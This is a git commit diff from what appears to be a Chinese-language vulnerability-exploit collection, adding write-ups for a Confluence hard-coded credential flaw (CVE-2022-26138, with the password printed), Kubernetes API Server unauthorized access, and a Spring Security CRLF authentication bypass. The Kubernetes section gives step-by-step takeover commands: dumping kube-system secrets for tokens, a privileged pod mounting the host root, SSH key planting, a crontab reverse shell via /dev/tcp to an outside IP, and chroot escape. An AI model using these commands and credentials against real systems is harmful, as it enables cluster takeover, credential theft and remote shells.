更新漏洞

2025-11-05 10:50:23 +00:00 · 2023-02-28 17:36:35 +08:00 · 2023-02-28 17:36:35 +08:00 · d13a55ae2f
commit d13a55ae2f
parent 4a94d60344
8 changed files with 270 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -201,6 +201,7 @@
  * Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449
  * Atlassian Jira makeRequest SSRF漏洞 CVE-2019-8451
  * Atlassian Jira ViewUserHover.jspa 用户信息泄露漏洞 CVE-2020-14181
  * Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138
  * AVCON6 系统管理平台 download.action 任意文件下载漏洞
  * AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞
  * AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854
@ -444,6 +445,9 @@
  * Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
  * Weblogic 反序列化远程代码执行漏洞 CVE-2019-2725
  * Zabbix SAML身份绕过漏洞 CVE-2022-23131
 - 云安全漏洞
  * K8s API Server未授权命令执行
 - 其他漏洞
  * 微信客户端 远程命令执行漏洞
@ -506,6 +510,7 @@
  * Saltstack 未授权RCE漏洞 CVE-2021-25281~25283
  * SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592
  * Saltstack 远程命令执行漏洞 CVE-2020-11651 11652
  * VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978
  * VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
  * VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
  * VMware vCenter 任意文件读取漏洞
--- a/Web应用漏洞/Atlassian
+++ b/Web应用漏洞/Atlassian
@ -0,0 +1,51 @@
 # Atlassian Questions For Confluence 身份认证绕过漏洞CVE-2022-26138
 ## 漏洞描述
 Atlassian官方发布了2022年7月的安全更新，其中涉及到Confluence Server的多个漏洞，其中CVE-2022-26138为一个硬编码漏洞。
 当Confluence Server或Data Center上的Questions for Confluence app启用时，它会创建一个名为`disabledsystemuser`的Confluence用户帐户。此帐户旨在帮助将数据从应用程序迁移到 Confluence Cloud的管理员账号中。该帐户通过使用**硬编码密码**创建并添加到confluence-users组中，在默认情况下允许查看和编辑 Confluence 中的所有非受限页面。
 未经身份验证攻击者可以利用所知的硬编码密码登录Confluence并访问该组有权限访问的所有页面。
 ## 漏洞影响
 ```
 Questions for Confluence app == 2.7.34
 Questions for Confluence app == 2.7.35
 Questions for Confluence app == 3.0.2
 ```
 ## 漏洞分析
 下载应用程序 **confluence-questions-3.0.2.jar** 或者另外两个版本。
 ```
 https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar
 ```
 分析源码，在配置文件default.properties中可以找到所创建用户的相关信息，其中的username和password都是固定的。
 使用Java Decompiler打开jar文件，在配置文件default.properties中可以找到所创建用户的相关信息。
 ![image-20230228165102312](images/image-20230228165102312.png)
 上传Questions for Confluence应用程序，使用硬编码用户密码成功登录。
 ```
 predefined.user.username=disabledsystemuser
 predefined.user.password=disabled1system1user6708
 ```
 ## 修复建议
 目前厂商已发布升级更新Questions for Confluence扩展至以下安全版本:
 - 2.7.x >= 2.7.38 (Confluence 6.13.18 到 7.16.2)
 - Versions >= 3.0.5 (Confluence 7.16.3 之后的版本)
 ```
 https://jira.atlassian.com/browse/CONFSERVER-79483
 ```
--- a/Web应用漏洞/images/image-20230228165102312.png
+++ b/Web应用漏洞/images/image-20230228165102312.png
--- a/Server未授权命令执行.md
+++ b/Server未授权命令执行.md
@ -0,0 +1,170 @@
 # K8s API Server未授权命令执行
 ## 漏洞描述
 Kubernetes是一个可以移植、可扩展的开源平台，使用 声明式的配置 并依据配置信息自动地执行容器化应用程序的管理。在所有的容器编排工具中（类似的还有 docker swarm / mesos等），Kubernetes的生态系统更大、增长更快，有更多的支持、服务和工具可供用户选择。
 K8s 的API Server默认服务端口为8080(insecure-port)和6443(secure-port)，8080端口提供HTTP服务，没有认证授权机制，而6443端口提供HTTPS服务，支持认证(使用令牌或客户端证书进行认证)和授权服务。默认情况下8080端口不启动，而6443端口启动。这两个端口的开放取决于/etc/kubernetes/manifests/kube-apiserver.yaml配置文件。
 如果目标K8s的8080端口开启了，由于其没有认证授权机制，因此存在未授权访问。
 如果目标K8s的6443端口开启了，如果配置错误，也可以导致存在未授权访问。
 ## 漏洞复现
 ### 8080端口
 默认情况下，8080端口关闭的，手动开启：
 ```
 cd /etc/kubernetes/manifests
 vim kube-apiserver.yaml
 ```
 高版本的k8s中，将--insecure-port这个配置删除了，因此添加如下两行：
 ```
 - --insecure-port=8080
 - --insecure-bind-address=0.0.0.0
 ```
 ![image-20230215102911534](images/image-20230215102911534.png)
 重启k8s：
 ```
 systemctl restart kubectl
 ```
 访问8080端口即可看到存在未授权：
 ![image-20230215110103802](images/image-20230215110103802.png)
 也可以使用kubectl远程连接获得信息：
 ```
 kubectl -s http://your-vps-ip:8080 get nodes
 ```
 注：在高版本（1.20及其以后）的K8s中直接禁用了该端口，并且无法打开。
 ### 6443端口
 如果运维人员配置不当，将"system:anonymous"用户绑定到"cluster-admin"用户组，则会使得6443端口允许匿名用户以管理员权限访问。
 正常情况下访问6443端口，提示Forbidden。
 ![image-20230215110607076](images/image-20230215110607076.png)
 执行如下命令将"system:anonymous"用户绑定到"cluster-admin"用户组：
 ```
 kubectl create clusterrolebinding cluster-system-anonymous --clusterrole=cluster-admin --user=system:anonymous
 ```
 再次访问访问6443端口，即可未授权访问。
 ## 漏洞利用
 ### 命令执行
 #### 查看k8s集群信息
 ```
 kubectl -s http://your-vps-ip:8080 cluster-info
 ```
 #### 查看node节点信息
 ```
 #查看node节点
 kubectl -s http://your-vps-ip:8080 get nodes
 #查看node节点详细信息
 kubectl -s http://your-vps-ip:8080 get nodes -o wide
 ```
 #### 查看pod节点信息
 ```
 #查看所有的pod
 kubectl -s http://your-vps-ip:8080 get pods -A
 ```
 #### 执行其他命令
 通过获取到的pods节点信息，进入对应docker 命令执行。-n对应的是NAMESPACE，-it 对应的是NAME：
 ```
 #进入命名空间为default，名字为hello-minikube的容器
 kubectl -s http://your-vps-ip:8080 exec -n default -it hello-minikube -- /bin/bash
 #进入命名空间为kube-system，名字为etcd-ubuntu的容器
 kubectl -s http://your-vps-ip:8080 exec -n kube-system -it etcd-ubuntu -- /bin/sh
 ```
 ### 获取Token登录dashboard
 访问如下接口，即可看到K8s所有的Token，我们过滤找到dashboard-admin相关的Token。
 ```
 http://your-vps-ip:8080/api/v1/namespaces/kube-system/secrets/
 https://your-vps-ip:6443/api/v1/namespaces/kube-system/secrets/
 ```
 然后对其base64解码一次，即可使用base64解码后的Token登录K8s的dashboard。
 ### 获取宿主机权限
 #### 创建pod
 通过k8s dashboard，创建特权Pods来获得宿主机权限。登录dashboard后台后，点击右上角+号，然后输入如下命JSON内容，创建名为myapp的pod，并且将宿主机的目录挂在到了/mnt目录下：
 ```
 apiVersion: v1
 kind: Pod
 metadata:
  name: myapp
 spec:
  containers:
  - image: nginx
    name: container
    volumeMounts:
    - mountPath: /mnt
      name: test
  volumes:
  - name: test
    hostPath:
      path: /
 ```
 点击工作负载→Pods，可以看到刚才创建的pod。
 点击myapp名称。点击右上角进入Shell窗口。
 #### 写入ssh公钥
 切换到/mnt/root/.ssh目录下，写入公钥文件，即可免密登录宿主机。
 #### 定时任务反弹shell
 也可以往宿主机写入crontab来反弹获取shell，执行如下命令，将反弹shell的命令写入/var/spool/cron/root文件中：
 ```
 echo "*/1  *  *  *  *   /bin/bash -i>&/dev/tcp/172.16.200.58/4444 0>&1" > root
 ```
 nc监听接收反弹shell：
 ```
 $ nc -lvp 4444
 ```
 #### chroot逃逸
 ```
 chroot /mnt
 ```
--- a/云安全漏洞/images/image-20230215102911534.png
+++ b/云安全漏洞/images/image-20230215102911534.png
--- a/云安全漏洞/images/image-20230215110103802.png
+++ b/云安全漏洞/images/image-20230215110103802.png
--- a/云安全漏洞/images/image-20230215110607076.png
+++ b/云安全漏洞/images/image-20230215110607076.png
--- a/服务器应用漏洞/VMware
+++ b/服务器应用漏洞/VMware
@ -0,0 +1,44 @@
 # VMware Spring Security 身份认证绕过漏洞 CVE-2022-22978
 ## 漏洞描述
 VMware Spring Security是美国威睿（VMware）公司的一套为基于Spring的应用程序提供说明性安全保护的安全框架。VMware Spring Security存在授权问题漏洞，该漏洞源于在应用程序中使用 RegexRequestMatcher 以及正则表达式的通配符（**.**）处理不受信任的输入时存在输入验证错误。
 参考链接：
 - https://xz.aliyun.com/t/11473
 ## 漏洞影响
 ```
 Spring Security 5.5.x < 5.5.7 
 Spring Security 5.6.x < 5.6.4 
 Spring Security 其他低版本同样受影响
 ```
 ## 漏洞复现
 正常访问/admin/下任何路由均会提示403。
 在/admin/下任何路由中，插入`%0a`或者`%0d`,即可绕过验证访问页面。
 poc：
 ```
 /admin/%0a%0d
 ```
 例如：
 ```
 GET /admin/%0atest HTTP/1.1
 ```
 ```
 GET /admin/%0dtest HTTP/1.1
 ```
 ```
 GET /admin/%0a%0d%0dtest HTTP/1.1
 ```